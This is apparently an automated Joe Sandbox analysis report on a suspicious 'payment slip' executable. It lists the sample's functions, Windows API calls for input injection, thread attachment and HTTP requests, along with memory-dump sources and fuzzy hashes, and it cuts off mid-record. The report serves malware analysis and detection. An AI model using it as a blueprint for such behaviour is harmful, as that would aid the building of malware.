                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B165
                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0009B16C
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B17B
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0009B18D
                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B1A6
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B1B8
                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B1FD
                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B212
                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B21D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                        • String ID:
                                        • API String ID: 2156557900-0
                                        • Opcode ID: 1e75a74ff7a7271e150d5b5de671644b5ec4486076cfd4fe0afc06b0c78acf45
                                        • Instruction ID: 14e7ee39502febb726976733fb1d63dd75bb84080a407254d371e969a994cd8f
                                        • Opcode Fuzzy Hash: 1e75a74ff7a7271e150d5b5de671644b5ec4486076cfd4fe0afc06b0c78acf45
                                        • Instruction Fuzzy Hash: 1F31AD71504204BFEF209F28EE48F6DBBADFB51325F104009FA55D6190D7B8AE819F60
                                        Function 00062C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00062C94
                                          • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                          • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                        • _free.LIBCMT ref: 00062CA0
                                        • _free.LIBCMT ref: 00062CAB
                                        • _free.LIBCMT ref: 00062CB6
                                        • _free.LIBCMT ref: 00062CC1
                                        • _free.LIBCMT ref: 00062CCC
                                        • _free.LIBCMT ref: 00062CD7
                                        • _free.LIBCMT ref: 00062CE2
                                        • _free.LIBCMT ref: 00062CED
                                        • _free.LIBCMT ref: 00062CFB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: f5bd0660625df2dcfeb3c718c0aee2854385dafe0c9f5fdd918915cbccc42b5d
                                        • Instruction ID: 053ce59edaa254d97d7cd6f8cd65d2b17eb2e6fdaf406fe36c15ef6296b839d0
                                        • Opcode Fuzzy Hash: f5bd0660625df2dcfeb3c718c0aee2854385dafe0c9f5fdd918915cbccc42b5d
                                        • Instruction Fuzzy Hash: 7B117476600508BFCB06EF54D982CDD3BA6FF45390F5145A5FA489F223DA31EE509BA0
                                        Function 00031410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00031459
                                        • OleUninitialize.OLE32(?,00000000), ref: 000314F8
                                        • UnregisterHotKey.USER32(?), ref: 000316DD
                                        • DestroyWindow.USER32(?), ref: 000724B9
                                        • FreeLibrary.KERNEL32(?), ref: 0007251E
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0007254B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                        • String ID: close all
                                        • API String ID: 469580280-3243417748
                                        • Opcode ID: a7027f5cc0c8157102a974bf9a039e301d731e712a6132b0bfd37e181152627b
                                        • Instruction ID: 45a45f337461acfdfce95a123900eb8885fc5162517d4afc9d8b8ada80eca661
                                        • Opcode Fuzzy Hash: a7027f5cc0c8157102a974bf9a039e301d731e712a6132b0bfd37e181152627b
                                        • Instruction Fuzzy Hash: 2AD16E31B01212CFDB2AEF55C499FA9F7A4BF09700F1582ADE44A6B252CB34AD12CF54
                                        Function 00035BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowLongW.USER32(?,000000EB), ref: 00035C7A
                                          • Part of subcall function 00035D0A: GetClientRect.USER32(?,?), ref: 00035D30
                                          • Part of subcall function 00035D0A: GetWindowRect.USER32(?,?), ref: 00035D71
                                          • Part of subcall function 00035D0A: ScreenToClient.USER32(?,?), ref: 00035D99
                                        • GetDC.USER32 ref: 000746F5
                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00074708
                                        • SelectObject.GDI32(00000000,00000000), ref: 00074716
                                        • SelectObject.GDI32(00000000,00000000), ref: 0007472B
                                        • ReleaseDC.USER32(?,00000000), ref: 00074733
                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000747C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                        • String ID: U
                                        • API String ID: 4009187628-3372436214
                                        • Opcode ID: 1109d89cfcf4bdc3fbf5e5355325635cb401d4a6e267661854a5670f982e24b6
                                        • Instruction ID: 6fe5d15eacc0f349a28cab3f4900633199e832419099ac738d5fb3f71e6dcae8
                                        • Opcode Fuzzy Hash: 1109d89cfcf4bdc3fbf5e5355325635cb401d4a6e267661854a5670f982e24b6
                                        • Instruction Fuzzy Hash: 5671DD34804205DFCF268F64CD84EBE3BF5FF4A325F188269E9595A2A6C7389881DF51
                                        Function 000A359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 000A35E4
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • LoadStringW.USER32(00102390,?,00000FFF,?), ref: 000A360A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LoadString$_wcslen
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 4099089115-2391861430
                                        • Opcode ID: 5b0cd7c3a6b6f96c2ed1a91b16595e98f2a0139e9b8067583694097ddfd741ed
                                        • Instruction ID: b08159f9a6970f7f2e0b40ba690a08b060010352866397118bb640d68c039506
                                        • Opcode Fuzzy Hash: 5b0cd7c3a6b6f96c2ed1a91b16595e98f2a0139e9b8067583694097ddfd741ed
                                        • Instruction Fuzzy Hash: D2516E71804209BBDF15EBE0CC82EEDBB78AF05310F145125F205761A2EB711B99DFA1
                                        Function 000C2DFD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000C2E1C
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 000C2E4F
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 000C2E84
                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 000C2EB6
                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 000C2EE0
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 000C2EF1
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000C2F0B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LongWindow$MessageSend
                                        • String ID: U
                                        • API String ID: 2178440468-2399391058
                                        • Opcode ID: 1aa9a49f9c48789d2784677678f9270c1a96196d69e8039003f4ed91f2984738
                                        • Instruction ID: fded0992901986a0799d2a031e37539e638682828adea777a45f589bbb35ad06
                                        • Opcode Fuzzy Hash: 1aa9a49f9c48789d2784677678f9270c1a96196d69e8039003f4ed91f2984738
                                        • Instruction Fuzzy Hash: BA313530604254AFEB20DF18DC84FA937E0FB9A710F150168F944AFAB2CBB5AC80DB00
                                        Function 000AC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000AC272
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000AC29A
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000AC2CA
                                        • GetLastError.KERNEL32 ref: 000AC322
                                        • SetEvent.KERNEL32(?), ref: 000AC336
                                        • InternetCloseHandle.WININET(00000000), ref: 000AC341
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                        • String ID:
                                        • API String ID: 3113390036-3916222277
                                        • Opcode ID: f60c3c1cfd8f59c054cb2cfcac2b7c68ad2f581e155bf8fa0e3c816f3ef7c0e4
                                        • Instruction ID: eabc88df7c123f4bff00898a0ba863c7d2f8aec66835cf218a385abb8559e2b1
                                        • Opcode Fuzzy Hash: f60c3c1cfd8f59c054cb2cfcac2b7c68ad2f581e155bf8fa0e3c816f3ef7c0e4
                                        • Instruction Fuzzy Hash: 60317FB2504604AFFB219FA4CC88EAB7BFCEB4A744F15851EF44AD6201DB34DE059B60
                                        Function 0009989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00073AAF,?,?,Bad directive syntax error,000CCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 000998BC
                                        • LoadStringW.USER32(00000000,?,00073AAF,?), ref: 000998C3
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00099987
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: HandleLoadMessageModuleString_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                        • API String ID: 858772685-4153970271
                                        • Opcode ID: a40d99266a86a25b4a17446ef30ddc9027e11f67eb4a331e607e2c257ba57892
                                        • Instruction ID: e4d4b2ba0b96a9902762ca0244648191305d79230c6f3da5b4bd9ef137bff797
                                        • Opcode Fuzzy Hash: a40d99266a86a25b4a17446ef30ddc9027e11f67eb4a331e607e2c257ba57892
                                        • Instruction Fuzzy Hash: 59215E3184021EABDF16AF94CC46EEE7779FF18300F044469F619660A2EB75AA18EB50
                                        Function 0009209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32 ref: 000920AB
                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 000920C0
                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0009214D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameParentSend
                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                        • API String ID: 1290815626-3381328864
                                        • Opcode ID: 3eb35731134b9866e10559de4ba1b8161ee020c148a2b9b32e6f1da96e44c64a
                                        • Instruction ID: 9e3ed4af8df75a74c266fd6f48926b3993a564105d3bb350367ec8d50b8ef90f
                                        • Opcode Fuzzy Hash: 3eb35731134b9866e10559de4ba1b8161ee020c148a2b9b32e6f1da96e44c64a
                                        • Instruction Fuzzy Hash: 7F11EC7A688706BAFE116720DC07DFB37DCDB15726F200116FB04A90E2FFA558557614
                                        Function 0006CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                        • String ID:
                                        • API String ID: 1282221369-0
                                        • Opcode ID: 772fa45dd3188dc4a5f852cd547726591804bd8783e8427523d7b23ffddb4862
                                        • Instruction ID: 1741abb00b9734ea0f05e2114653837793e1eb24416a971899a8c3c5766010e0
                                        • Opcode Fuzzy Hash: 772fa45dd3188dc4a5f852cd547726591804bd8783e8427523d7b23ffddb4862
                                        • Instruction Fuzzy Hash: 8F611971A04601AFEB25AFB49841FBE7BE7AF05350F04417EF98597242DA369E4187A0
                                        Function 00048B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00086890
                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 000868A9
                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000868B9
                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 000868D1
                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000868F2
                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00048874,00000000,00000000,00000000,000000FF,00000000), ref: 00086901
                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0008691E
                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00048874,00000000,00000000,00000000,000000FF,00000000), ref: 0008692D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                        • String ID:
                                        • API String ID: 1268354404-0
                                        • Opcode ID: 6dafdfae072e3c8e24a42bd24f1f8ec22f39a3e1cdcfaf8e46fa3a9e334745a6
                                        • Instruction ID: d06ff88c92382ad4269b04c9f602de5f2fb15b9b7c1d1b79012bd4e43d49b41c
                                        • Opcode Fuzzy Hash: 6dafdfae072e3c8e24a42bd24f1f8ec22f39a3e1cdcfaf8e46fa3a9e334745a6
                                        • Instruction Fuzzy Hash: C5515AB0600205EFEB20DF24CC55FAE7BB5FB44750F108628F996972A0DB75E990DB94
                                        Function 000AC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000AC182
                                        • GetLastError.KERNEL32 ref: 000AC195
                                        • SetEvent.KERNEL32(?), ref: 000AC1A9
                                          • Part of subcall function 000AC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000AC272
                                          • Part of subcall function 000AC253: GetLastError.KERNEL32 ref: 000AC322
                                          • Part of subcall function 000AC253: SetEvent.KERNEL32(?), ref: 000AC336
                                          • Part of subcall function 000AC253: InternetCloseHandle.WININET(00000000), ref: 000AC341
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                        • String ID:
                                        • API String ID: 337547030-0
                                        • Opcode ID: ce1c52117203a57327d56b0312b7da77226c0ff49cf15af7341888862cb19124
                                        • Instruction ID: 9c888ac863141b38a524e2384d632c8a6e02283ba8e92b7cb61aaa40a126d023
                                        • Opcode Fuzzy Hash: ce1c52117203a57327d56b0312b7da77226c0ff49cf15af7341888862cb19124
                                        • Instruction Fuzzy Hash: 7B31BE71200645AFFB219FE5DD04EAABBF8FF1A300B05452EF95A86610D735E810DBA0
                                        Function 000925A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00093A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00093A57
                                          • Part of subcall function 00093A3D: GetCurrentThreadId.KERNEL32 ref: 00093A5E
                                          • Part of subcall function 00093A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000925B3), ref: 00093A65
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 000925BD
                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000925DB
                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 000925DF
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 000925E9
                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00092601
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00092605
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0009260F
                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00092623
                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00092627
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                        • String ID:
                                        • API String ID: 2014098862-0
                                        • Opcode ID: 260cda2da3b8de5cbd366892a457d085662a199ace28fd4b4a20910ab3e77f3f
                                        • Instruction ID: 2297a3c54597f6413d42c50a0d0bedc68d6da82e4f207af73ec04683fa05ccc6
                                        • Opcode Fuzzy Hash: 260cda2da3b8de5cbd366892a457d085662a199ace28fd4b4a20910ab3e77f3f
                                        • Instruction Fuzzy Hash: B101F230790610BBFB206769DC8AF993F59DF4EB12F110001F318AF1E2C9F22444DAAA
                                        Function 00091803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00091449,?,?,00000000), ref: 0009180C
                                        • HeapAlloc.KERNEL32(00000000,?,00091449,?,?,00000000), ref: 00091813
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00091449,?,?,00000000), ref: 00091828
                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00091449,?,?,00000000), ref: 00091830
                                        • DuplicateHandle.KERNEL32(00000000,?,00091449,?,?,00000000), ref: 00091833
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00091449,?,?,00000000), ref: 00091843
                                        • GetCurrentProcess.KERNEL32(00091449,00000000,?,00091449,?,?,00000000), ref: 0009184B
                                        • DuplicateHandle.KERNEL32(00000000,?,00091449,?,?,00000000), ref: 0009184E
                                        • CreateThread.KERNEL32(00000000,00000000,00091874,00000000,00000000,00000000), ref: 00091868
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                        • String ID:
                                        • API String ID: 1957940570-0
                                        • Opcode ID: 988dc9d0380e7eaa1fdc3bc85dad13b1867fd34d91671d5bcbfbb982e5167f0a
                                        • Instruction ID: e77362e85b62c784bc5f8b533100d9aed017eedf83cd1aa7534de967fd0a4358
                                        • Opcode Fuzzy Hash: 988dc9d0380e7eaa1fdc3bc85dad13b1867fd34d91671d5bcbfbb982e5167f0a
